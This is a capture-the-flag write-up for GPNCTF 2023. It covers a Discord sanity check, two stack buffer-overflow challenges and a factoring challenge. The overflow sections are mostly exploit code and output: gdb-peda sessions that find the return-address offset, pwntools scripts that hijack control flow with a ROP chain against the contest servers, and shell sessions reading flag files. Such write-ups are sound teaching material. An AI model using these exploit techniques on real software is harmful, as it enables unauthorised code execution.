This competition was held from 2023/6/9 19:00 (JST) to 2023/6/11 7:00 (JST).
This time, too, I took part as a team. We finished 108th out of 442 teams with 400 points.
Here are writeups for the challenges I solved myself.
sanitiy check (misc)
I joined the Discord and looked at the messages in the #rules channel, where the flag was posted.
GPNCTF{w3lc0m3_70_6pnc7f_2023_2f41b7e84a02939e}
Overflow in the fl4gtory (intro)
Call the shutoff function via the buffer overflow (BOF).
```
$ gdb -q ./overflow-in-the-fl4gtory
Reading symbols from ./overflow-in-the-fl4gtory...
(No debugging symbols found in ./overflow-in-the-fl4gtory)
gdb-peda$ pattc 300
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%'
gdb-peda$ r
Starting program: /media/sf_Shared/overflow-in-the-fl4gtory
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%

Program received signal SIGSEGV, Segmentation fault.
Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled off'.

Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled on'.

[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x7fffffffdec8 --> 0x7fffffffe23f ("/media/sf_Shared/overflow-in-the-fl4gtory")
RCX: 0x7ffff7ec00e0 (<__GI___libc_write+16>:    cmp    rax,0xfffffffffffff000)
RDX: 0x1
RSI: 0x1
RDI: 0x7ffff7f9ca10 --> 0x0
RBP: 0x2541322541632541 ('A%cA%2A%')
RSP: 0x7fffffffddb8 ("HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
RIP: 0x4011b8 (<main+52>:    ret)
R8 : 0x4053cd --> 0x0
R9 : 0x0
R10: 0x1000
R11: 0x202
R12: 0x0
R13: 0x7fffffffded8 --> 0x7fffffffe269 ("CLUTTER_IM_MODULE=xim")
R14: 0x403df0 --> 0x401110 (endbr64)
R15: 0x7ffff7ffd020 --> 0x7ffff7ffe2e0 --> 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4011ad <main+41>:    call   0x401030 <puts@plt>
   0x4011b2 <main+46>:    mov    eax,0x0
   0x4011b7 <main+51>:    leave
=> 0x4011b8 <main+52>:    ret
   0x4011b9:    add    BYTE PTR [rax],al
   0x4011bb:    add    bl,dh
   0x4011bd <_fini+1>:    nop    edx
   0x4011c0 <_fini+4>:    sub    rsp,0x8
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffddb8 ("HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
0008| 0x7fffffffddc0 ("%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
0016| 0x7fffffffddc8 ("A%JA%fA%5A%KA%gA%6A%")
0024| 0x7fffffffddd0 ("5A%KA%gA%6A%")
0032| 0x7fffffffddd8 --> 0x7f0025413625
0040| 0x7fffffffdde0 --> 0x7fffffffdec8 --> 0x7fffffffe23f ("/media/sf_Shared/overflow-in-the-fl4gtory")
0048| 0x7fffffffdde8 --> 0x4be8a50619ff2784
0056| 0x7fffffffddf0 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004011b8 in main ()
gdb-peda$ patto HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%
HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A% found at offset: 264
```
So it is enough to send 264 bytes of anything followed by the address of the shutoff function (the binary is not PIE, so the address is fixed).
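As an added example (not part of the original writeup), the following Python reproduces offline what gdb-peda's `pattc`/`patto` did above: generate a cyclic pattern in which every 4-byte window is unique, read back the bytes that landed in the return-address slot, and turn them into the offset. The pattern is a de Bruijn sequence rather than peda's charset-based one, so the exact crash string from the session above cannot be looked up here; the overflow is simulated instead with a model frame whose return address sits 264 bytes into the buffer. The shutoff address 0x401146 is read back from the `F\x11@` bytes of the payload printed later in the writeup.

```python
import struct

# Added example, not the writeup's code: de Bruijn cyclic pattern + offset lookup
# (what gdb-peda's `pattc` / `patto` do), run offline against a simulated frame.

def de_bruijn(alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """Yield the bytes of a de Bruijn sequence: every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)

def cyclic(length, n=4):
    """First `length` bytes of the pattern (like `pattc length`)."""
    out = bytearray()
    for b in de_bruijn(n=n):
        if len(out) == length:
            break
        out.append(b)
    return bytes(out)

def cyclic_find(value, n=4, length=4096):
    """Offset of `value` in the pattern (like `patto`). `value` may be the bytes
    seen on the stack or the integer a register holds; the low bytes of a
    little-endian qword are the first pattern bytes that overwrote it."""
    if isinstance(value, int):
        value = struct.pack("<Q", value)
    return cyclic(length, n).find(value[:n])

def simulate_overflow(payload, ret_offset=264):
    """Model of the vulnerable frame (assumption for this example): the saved
    return address sits `ret_offset` bytes into the buffer, as gdb found."""
    return payload[ret_offset:ret_offset + 8]

def build_payload(offset, target):
    """Padding up to the saved return address, then the address to return into."""
    return b"A" * offset + struct.pack("<Q", target)

# shutoff() in overflow-in-the-fl4gtory, read back from the printed payload bytes F\x11@
SHUTOFF = 0x401146

if __name__ == "__main__":
    pat = cyclic(300)
    ret_slot = simulate_overflow(pat)   # what gdb shows at RSP when `ret` faults
    off = cyclic_find(ret_slot)         # 264
    print("offset:", off)
    print(build_payload(off, SHUTOFF))
```

The uniqueness of every 4-byte window is what makes the lookup unambiguous; with a plain run of `A`s the crash value carries no position information at all.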
```python
#!/usr/bin/env python3
from pwn import *

# DEBUG=1 runs the binary under gdb, REMOTE=1 talks to the challenge server,
# otherwise run it locally
if args.DEBUG:
    p = gdb.debug("./overflow-in-the-fl4gtory")
elif args.REMOTE:
    p = remote('overflow-in-the-fl4gtory-0.chals.kitctf.de', 1337, ssl=True)
else:
    p = process("./overflow-in-the-fl4gtory")

elf = ELF('./overflow-in-the-fl4gtory')
shutoff_addr = elf.symbols['shutoff']   # no PIE, so the symbol address is the runtime address

payload = b'A' * 264            # fill the buffer up to the saved return address
payload += p64(shutoff_addr)    # overwrite the return address with shutoff()
print(payload)
p.sendline(payload)
data = p.recvline().rstrip()
print(data)

p.interactive()
```
Running it gives the following.
```
[+] Opening connection to overflow-in-the-fl4gtory-0.chals.kitctf.de on port 1337: Done
[*] '/media/sf_Shared/overflow-in-the-fl4gtory'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF\x11@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF\x11@'
[*] Switching to interactive mode
Pipe shut off! Congrats! You've solved (or exploited) the overflow! Get your flag:
$ ls
flag.txt
overflow-in-the-fl4gtory
$ cat flag.txt
GPNCTF{M0re_0verf0ws_ar3_c0ming_:O}
```
GPNCTF{M0re_0verf0ws_ar3_c0ming_:O}
Overflows keep flowing (intro)
Via the BOF, call the shutoff function with 0xdeadbeefd3adc0de as its argument. On x86-64 the first argument is passed in rdi, so a `pop rdi ; ret` gadget is needed to load it. Because the chain enters shutoff through a `ret` rather than a `call`, nothing pushes a return address and rsp ends up 8 bytes off from what the callee expects; an extra `ret` gadget placed before shutoff restores the 16-byte stack alignment.
```
$ ROPgadget --binary overflows-keep-flowing --re "pop rdi"
Gadgets information
============================================================
0x00000000004012b3 : pop rdi ; ret

Unique gadgets found: 1
$ ROPgadget --binary overflows-keep-flowing | grep ": ret"
0x000000000040101a : ret
```
```python
#!/usr/bin/env python3
from pwn import *

# GDB=1 runs the binary under gdb, REMOTE=1 talks to the challenge server,
# otherwise run it locally
if args.GDB:
    p = gdb.debug("./overflows-keep-flowing")
elif args.REMOTE:
    p = remote('overflows-keep-flowing-0.chals.kitctf.de', 1337, ssl=True)
else:
    p = process("./overflows-keep-flowing")

elf = ELF('./overflows-keep-flowing')
shutoff_addr = elf.symbols['shutoff']
pop_rdi = 0x4012b3      # pop rdi ; ret   (from ROPgadget)
ret_addr = 0x40101a     # ret             (stack alignment)

payload = b'A' * 264                 # up to the saved return address
payload += p64(pop_rdi)              # rdi = first argument
payload += p64(0xdeadbeefd3adc0de)
payload += p64(ret_addr)             # re-align rsp to 16 bytes before the call
payload += p64(shutoff_addr)
print(payload)
p.sendline(payload)
data = p.recvline().rstrip()
print(data)

p.interactive()
```
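As an added example (not the writeup's script), the chain above is laid out explicitly below and walked the way the CPU would, so the alignment that the extra `ret` gadget fixes can be checked before sending anything. The gadget addresses are those ROPgadget reported; the shutoff address 0x4011b6 is read back from the `\xb6\x11@` bytes of the payload printed below; RET_SLOT_RSP reuses the RSP value gdb showed when main's `ret` faulted in the first challenge, standing in for the address of the saved return address (an assumption for this binary; only its value mod 16 matters).

```python
import struct

# Added example, not the writeup's script: explicit ROP chain layout for
# overflows-keep-flowing plus a stack-alignment check.

OFFSET = 264
POP_RDI_RET = 0x4012b3          # pop rdi ; ret      (ROPgadget)
RET = 0x40101a                  # ret                (ROPgadget)
SHUTOFF = 0x4011b6              # shutoff(), from the printed payload \xb6\x11@
ARG = 0xDEADBEEFD3ADC0DE
RET_SLOT_RSP = 0x7FFFFFFFDDB8   # RSP at main's faulting ret (first challenge's gdb session; assumption here)

def p64(v):
    return struct.pack("<Q", v)

# A chain is a list of (label, qword, pops): gadgets with the number of qwords
# they pop before their `ret`, "arg" entries that those pops consume, and the
# target function last.
def chain_bytes(chain):
    return b"".join(p64(q) for _, q, _ in chain)

def entry_rsp(ret_slot_rsp, chain):
    """Walk the chain as the CPU does; return rsp when the last entry starts."""
    rsp = ret_slot_rsp
    for label, _, pops in chain:
        if label == "arg":
            continue            # consumed by the previous gadget's pop(s)
        rsp += 8                # the `ret` that transfers control here pops this qword
        rsp += 8 * pops         # each `pop` consumes the following qword
    return rsp

def aligned_at_entry(rsp):
    """SysV x86-64 expects rsp ≡ 8 (mod 16) at function entry: 16-byte aligned
    before `call` pushed the return address. Entering via `ret` pushes nothing,
    so a chain can leave the callee 8 bytes off; SSE code (movaps in printf and
    friends) then faults."""
    return rsp % 16 == 8

def build(with_ret_gadget):
    """Payload bytes and whether shutoff would start with a correctly aligned stack."""
    chain = [("pop rdi; ret", POP_RDI_RET, 1), ("arg", ARG, 0)]
    if with_ret_gadget:
        chain.append(("ret", RET, 0))
    chain.append(("shutoff", SHUTOFF, 0))
    payload = b"A" * OFFSET + chain_bytes(chain)
    return payload, aligned_at_entry(entry_rsp(RET_SLOT_RSP, chain))

def as_signed64(v):
    """The argument as the service prints it: a signed 64-bit integer."""
    return struct.unpack("<q", p64(v))[0]

if __name__ == "__main__":
    for flag in (False, True):
        payload, ok = build(flag)
        print(f"ret gadget={flag}: aligned={ok} len={len(payload)}")
    print(as_signed64(ARG))     # the value shutoff echoes back
```

Without the `ret` gadget shutoff would be entered with rsp ≡ 0 (mod 16); with it, rsp ≡ 8 (mod 16), as after a real `call`. The signed reinterpretation of the argument is the -2401053089060765474 that the service prints in the run below.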
Running it gives the following. The -2401053089060765474 that shutoff prints is 0xdeadbeefd3adc0de reinterpreted as a signed 64-bit integer.
```
[+] Opening connection to overflows-keep-flowing-0.chals.kitctf.de on port 1337: Done
[*] '/media/sf_Shared/overflows-keep-flowing'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb3\x12@\x00\x00\x00\x00\x00\xde\xc0\xad\xd3\xef\xbe\xad\xde\x1a\x10@\x00\x00\x00\x00\x00\xb6\x11@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb3\x12@'
[*] Switching to interactive mode
Phew. Another accident prevented. Shutting off -2401053089060765474
$ ls
flag.txt
overflows-keep-flowing
$ cat flag.txt
GPNCTF{1_h0p3_y0u_d1dn't_actually_bu1ld_a_r0p_cha1n}
```
GPNCTF{1_h0p3_y0u_d1dn't_actually_bu1ld_a_r0p_cha1n}
ref4ctory (crypto)
It is enough to split each value in factors into a product of two integers other than 1 (the service accepts composite factors too, as the 1056 * 1129 and 43 * 87 splits below show). Let's factor them with factordb.
4 = 2 * 2
10 = 2 * 5
0x123120 = 1192224 = 2^5 * 3 * 11 * 1129 = 1056 * 1129
38201373467 = 111871 * 341477
247867822373 = 268817 * 922069
422943922809193529087 = 458843971 * 921759790997
3741 = 3 * 29 * 43 = 43 * 87
All that is left is to enter these numbers.
```
$ ncat --ssl ref4ctory-0.chals.kitctf.de 1337
Factor 4
a:2
2
b:2
2
Factor 10
a:2
2
b:5
5
Factor 1192224
a:1056
1056
b:1129
1129
Factor 38201373467
a:111871
111871
b:341477
341477
Factor 247867822373
a:268817
268817
b:922069
922069
Factor 422943922809193529087
a:458843971
458843971
b:921759790997
921759790997
Factor 3741
a:43
43
b:87
87
Here is your Flag. Good Job!
GPNCTF{Gaussian_Integers_n33d_Gaussian_Primes}
```
GPNCTF{Gaussian_Integers_n33d_Gaussian_Primes}